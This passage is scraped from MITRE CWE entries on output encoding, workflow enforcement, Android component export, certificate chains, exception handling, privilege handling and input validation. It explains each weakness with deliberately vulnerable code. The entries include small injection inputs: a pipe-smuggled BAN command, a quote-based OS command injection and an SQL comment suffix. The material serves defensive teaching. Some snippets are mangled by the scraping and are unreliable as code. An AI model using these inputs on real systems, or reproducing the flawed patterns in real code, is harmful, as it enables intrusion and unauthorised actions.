... Email Address: <%= email %> The value read from the form parameter is reflected back to the client browser without having been encoded prior to output, allowing various XSS attacks (CWE-79). Example 2 Consider a chat application in which a front-end web application communicates with a back-end server. The back-end is legacy code that does not perform authentication or authorization, so the front-end must implement it. The chat protocol supports two commands, SAY and BAN, although only administrators can use the BAN command. Each argument must be separated by a single space. The raw inputs are URL-encoded. The messaging protocol allows multiple commands to be specified on the same line if they are separated by a "|" character. First let's look at the back end command processor code (bad code)
Example Language: Perl
$inputString = readLineFromFileHandle($serverFH);
# generate an array of strings separated by the "|" character. @commands = split(/\|/, $inputString); foreach $cmd (@commands) { # separate the operator from its arguments based on a single whitespace ($operator, $args) = split(/ /, $cmd, 2); $args = UrlDecode($args); if ($operator eq "BAN") { ExecuteBan($args); }elsif ($operator eq "SAY") { ExecuteSay($args); }The front end web application receives a command, encodes it for sending to the server, performs the authorization check, and sends the command to the server. (bad code)
Example Language: Perl
$inputString = GetUntrustedArgument("command");
($cmd, $argstr) = split(/\s+/, $inputString, 2); # removes extra whitespace and also changes CRLF's to spaces $argstr =~ s/\s+/ /gs; $argstr = UrlEncode($argstr); if (($cmd eq "BAN") && (! IsAdministrator($username))) { die "Error: you are not the admin.\n"; }# communicate with file server using a file handle $fh = GetServerFileHandle("myserver"); print $fh "$cmd $argstr\n"; It is clear that, while the protocol and back-end allow multiple commands to be sent in a single request, the front end only intends to send a single command. However, the UrlEncode function could leave the "|" character intact. If an attacker provides: (attack code)
SAY hello world|BAN user12
then the front end will see this is a "SAY" command, and the $argstr will look like "hello world | BAN user12". Since the command is "SAY", the check for the "BAN" command will fail, and the front end will send the URL-encoded command to the back end: (result)
SAY hello%20world|BAN%20user12
The back end, however, will treat these as two separate commands: (result)
SAY hello world
BAN user12 Notice, however, that if the front end properly encodes the "|" with "%7C", then the back end will only process a single command. Example 3 This example takes user input, passes it through an encoding scheme, then lists the contents of the user's home directory based on the user name. (bad code)
Example Language: Perl
sub GetUntrustedInput {
return($ARGV[0]); }sub encode { my($str) = @_; }$str =~ s/\&/\&/gs; $str =~ s/\"/\"/gs; $str =~ s/\'/\'/gs; $str =~ s/\</\</gs; $str =~ s/\>/\>/gs; return($str); sub doit { my $uname = encode(GetUntrustedInput("username")); }print "<b>Welcome, $uname!</b><p>\n"; system("cd /home/$uname; /bin/ls -l"); The programmer attempts to encode dangerous characters, however the denylist for encoding is incomplete (CWE-184) and an attacker can still pass a semicolon, resulting in a chain with OS command injection (CWE-78). Additionally, the encoding routine is used inappropriately with command execution. An attacker doesn't even need to insert their own semicolon. The attacker can instead leverage the encoding routine to provide the semicolon to separate the commands. If an attacker supplies a string of the form: (attack code)
' pwd
then the program will encode the apostrophe and insert the semicolon, which functions as a command separator when passed to the system function. This allows the attacker to complete the command injection. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This weakness is primary to all weaknesses related to injection (CWE-74) since the inherent nature of injection involves the violation of structured messages.
Relationship CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks. However, input validation is not always sufficient, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a last name is inserted into a query. The name "O'Reilly" would likely pass the validation step since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise neutralized. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded. Terminology
The usage of the "encoding" and "escaping" terms varies widely. For example, in some programming languages, the terms are used interchangeably, while other languages provide APIs that use both terms for different tasks. This overlapping usage extends to the Web, such as the "escape" JavaScript function whose purpose is stated to be encoding. The concepts of encoding and escaping predate the Web by decades. Given such a context, it is difficult for CWE to adopt a consistent vocabulary that will not be misinterpreted by some constituency.
Theoretical
This is a data/directive boundary error in which data boundaries are not sufficiently enforced before it is sent to a different control sphere.
Research Gap
While many published vulnerabilities are related to insufficient output encoding, there is such an emphasis on input validation as a protection mechanism that the underlying causes are rarely described. Within CVE, the focus is primarily on well-understood issues like cross-site scripting and SQL injection. It is likely that this weakness frequently occurs in custom protocols that support multiple encodings, which are not necessarily detectable with automated techniques.
CWE-841: Improper Enforcement of Behavioral Workflow
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.
By performing actions in an unexpected order, or by omitting steps, an attacker could manipulate the business logic of the product or cause it to enter an invalid state. In some cases, this can also expose resultant weaknesses. For example, a file-sharing protocol might require that an actor perform separate steps to provide a username, then a password, before being able to transfer files. If the file-sharing server accepts a password command followed by a transfer command, without any username being provided, the product might still perform the transfer. Note that this is different than CWE-696, which focuses on when the product performs actions in the wrong sequence; this entry is closely related, but it is focused on ensuring that the actor performs actions in the correct sequence. Workflow-related behaviors include:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code is part of an FTP server and deals with various commands that could be sent by a user. It is intended that a user must successfully login before performing any other action such as retrieving or listing files. (bad code)
Example Language: Python
def dispatchCommand(command, user, args):
if command == 'Login':
loginUser(args)
return # user has requested a file if command == 'Retrieve_file':
if authenticated(user) and ownsFile(user,args):
sendFile(args)
return if command == 'List_files': listFiles(args)
return ... The server correctly avoids sending files to a user that isn't logged in and doesn't own the file. However, the server will incorrectly list the files in any directory without confirming the command came from an authenticated user, and that the user is authorized to see the directory's contents. Here is a fixed version of the above example: (good code)
Example Language: Python
def dispatchCommand(command, user, args):
... if command == 'List_files': if authenticated(user) and ownsDirectory(user,args):
listFiles(args)
return ... Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap This weakness is typically associated with business logic flaws, except when it produces resultant weaknesses. The classification of business logic flaws has been under-studied, although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles. Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors, which are not as well-represented in CWE as weaknesses related to input validation, memory management, etc.
CWE-926: Improper Export of Android Application Components
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains.
The attacks and consequences of improperly exporting a component may depend on the exported component:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This application is exporting an activity and a service in its manifest.xml: (bad code)
Example Language: XML
<activity android:name="com.example.vulnerableApp.mainScreen">
... <intent-filter> <action android:name="com.example.vulnerableApp.OPEN_UI" /> </intent-filter><category android:name="android.intent.category.DEFAULT" /> ... <service android:name="com.example.vulnerableApp.backgroundService"> ... <intent-filter> <action android:name="com.example.vulnerableApp.START_BACKGROUND" /> </intent-filter>... Because these components have intent filters but have not explicitly set 'android:exported=false' elsewhere in the manifest, they are automatically exported so that any other application can launch them. This may lead to unintended behavior or exploits. Example 2 This application has created a content provider to enable custom search suggestions within the application: (bad code)
Example Language: XML
<provider>
android:name="com.example.vulnerableApp.searchDB" </provider>android:authorities="com.example.vulnerableApp.searchDB"> Because this content provider is only intended to be used within the application, it does not need to be exported. However, in Android before 4.2, it is automatically exported thus potentially allowing malicious applications to access sensitive information.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-296: Improper Following of a Certificate's Chain of Trust
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate.
If a system does not follow the chain of trust of a certificate to a root server, the certificate loses all usefulness as a metric of trust. Essentially, the trust gained from a certificate is derived from a chain of trust -- with a reputable trusted entity at the end of that list. The end user must trust that reputable source, and this reputable source must vouch for the resource in question through the medium of the certificate. In some cases, this trust traverses several entities who vouch for one another. The entity trusted by the end user is at one end of this trust chain, while the certificate-wielding resource is at the other end of the chain. If the user receives a certificate at the end of one of these trust chains and then proceeds to check only that the first link in the chain, no real trust has been derived, since the entire chain must be traversed back to a trusted source to verify the certificate. There are several ways in which the chain of trust might be broken, including but not limited to:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code checks the certificate of a connected peer. (bad code)
Example Language: C
if ((cert = SSL_get_peer_certificate(ssl)) && host)
foo=SSL_get_verify_result(ssl);
if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo)) // certificate looks good, host can be trusted In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-755: Improper Handling of Exceptional Conditions
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following example attempts to resolve a hostname. (bad code)
Example Language: Java
protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {
String ip = req.getRemoteAddr(); }InetAddress addr = InetAddress.getByName(ip); ... out.println("hello " + addr.getHostName()); A DNS lookup failure will cause the Servlet to throw an exception. Example 2 The following example attempts to allocate memory for a character. After the call to malloc, an if statement is used to check whether the malloc function failed. (bad code)
Example Language: C
foo=malloc(sizeof(char)); //the next line checks to see if malloc failed
if (foo==NULL) { //We do nothing so we just ignore the error. }The conditional successfully detects a NULL return value from malloc indicating a failure, however it does not do anything to handle the problem. Unhandled errors may have unexpected results and may cause the program to crash or terminate. Instead, the if block should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following example notifies the user that the malloc function did not allocate the required memory resources and returns an error code. (good code)
Example Language: C
foo=malloc(sizeof(char)); //the next line checks to see if malloc failed
if (foo==NULL) { printf("Malloc failed to allocate memory resources"); }return -1; Example 3 The following code mistakenly catches a NullPointerException. (bad code)
Example Language: Java
try {
mysteryMethod();
} catch (NullPointerException npe) {} Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-235: Improper Handling of Extra Parameters
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This type of problem has a big role in multiple interpretation vulnerabilities and various HTTP attacks.
CWE-280: Improper Handling of Insufficient Permissions or Privileges
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the product in an invalid state.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This can be both primary and resultant. When primary, it can expose a variety of weaknesses because a resource might not have the expected state, and subsequent operations might fail. It is often resultant from Unchecked Error Condition (CWE-391).
Theoretical
Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).
Research Gap
This type of issue is under-studied, since researchers often concentrate on whether an object has too many permissions, instead of not enough. These weaknesses are likely to appear in environments with fine-grained models for permissions and privileges, which can include operating systems and other large-scale software packages. However, even highly simplistic permission/privilege models are likely to contain these issues if the developer has not considered the possibility of access failure.
CWE-274: Improper Handling of Insufficient Privileges
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Overlaps dropped privileges, insufficient permissions.
Theoretical
This has a layering relationship with Unchecked Error Condition and Unchecked Return Value.
Theoretical
Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the product makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).
CWE-159: Improper Handling of Invalid Use of Special Elements
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology
Precise terminology for the underlying weaknesses does not exist. Therefore, these weaknesses use the terminology associated with the manipulation.
Research Gap
Customized languages and grammars, even those that are specific to a particular product, are potential sources of weaknesses that are related to special elements. However, most researchers concentrate on the most commonly used representations for data transmission, such as HTML and SQL. Any representation that is commonly used is likely to be a rich source of weaknesses; researchers are encouraged to investigate previously unexplored representations.
Maintenance
The list of children for this entry is far from complete. However, the types of special elements might be too precise for use within CWE.
CWE-20: Improper Input Validation
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterInput validation is a frequently-used technique for checking potentially dangerous inputs in order to ensure that the inputs are safe for processing within the code, or when communicating with other components. Input can consist of:
Data can be simple or structured. Structured data can be composed of many nested layers, composed of combinations of metadata and raw data, with other simple or structured data. Many properties of raw data or metadata may need to be validated upon entry into the code, such as:
Implied or derived properties of data must often be calculated or inferred by the code itself. Errors in deriving properties may be considered a contributing factor to improper input validation. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated. (bad code)
Example Language: Java
...
public static final double price = 20.00; int quantity = currentUser.getAttribute("quantity"); double total = price * quantity; chargeUser(total); ... The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited. Example 2 This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares. (bad code)
Example Language: C
...
#define MAX_DIM 100 ... /* board dimensions */ int m,n, error; board_square_t *board; printf("Please specify the board height: \n"); error = scanf("%d", &m); if ( EOF == error ){ die("No integer passed: Die evil hacker!\n"); }printf("Please specify the board width: \n"); error = scanf("%d", &n); if ( EOF == error ){ die("No integer passed: Die evil hacker!\n"); }if ( m > MAX_DIM || n > MAX_DIM ) { die("Value too large: Die evil hacker!\n"); }board = (board_square_t*) malloc( m * n * sizeof(board_square_t)); ... While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program. Example 3 The following example shows a PHP application in which the programmer attempts to display a user's birthday and homepage. (bad code)
Example Language: PHP
$birthday = $_GET['birthday'];
$homepage = $_GET['homepage']; echo "Birthday: $birthday<br>Homepage: <a href=$homepage>click here</a>" The programmer intended for $birthday to be in a date format and $homepage to be a valid URL. However, since the values are derived from an HTTP request, if an attacker can trick a victim into clicking a crafted URL with <script> tags providing the values for birthday and / or homepage, then the script will run on the client's browser when the web server echoes the content. Notice that even if the programmer were to defend the $birthday variable by restricting input to integers and dashes, it would still be possible for an attacker to provide a string of the form: (attack code)
2009-01-09--
If this data were used in a SQL statement, it would treat the remainder of the statement as a comment. The comment could disable other security-related logic in the statement. In this case, encoding combined with input validation would be a more useful protection mechanism. Furthermore, an XSS (CWE-79) attack or SQL injection (CWE-89) are just a few of the potential consequences when input validation is not used. Depending on the context of the code, CRLF Injection (CWE-93), Argument Injection (CWE-88), or Command Injection (CWE-77) may also be possible. Example 4 The following example takes a user-supplied value to allocate an array of objects and then operates on the array. (bad code)
Example Language: Java
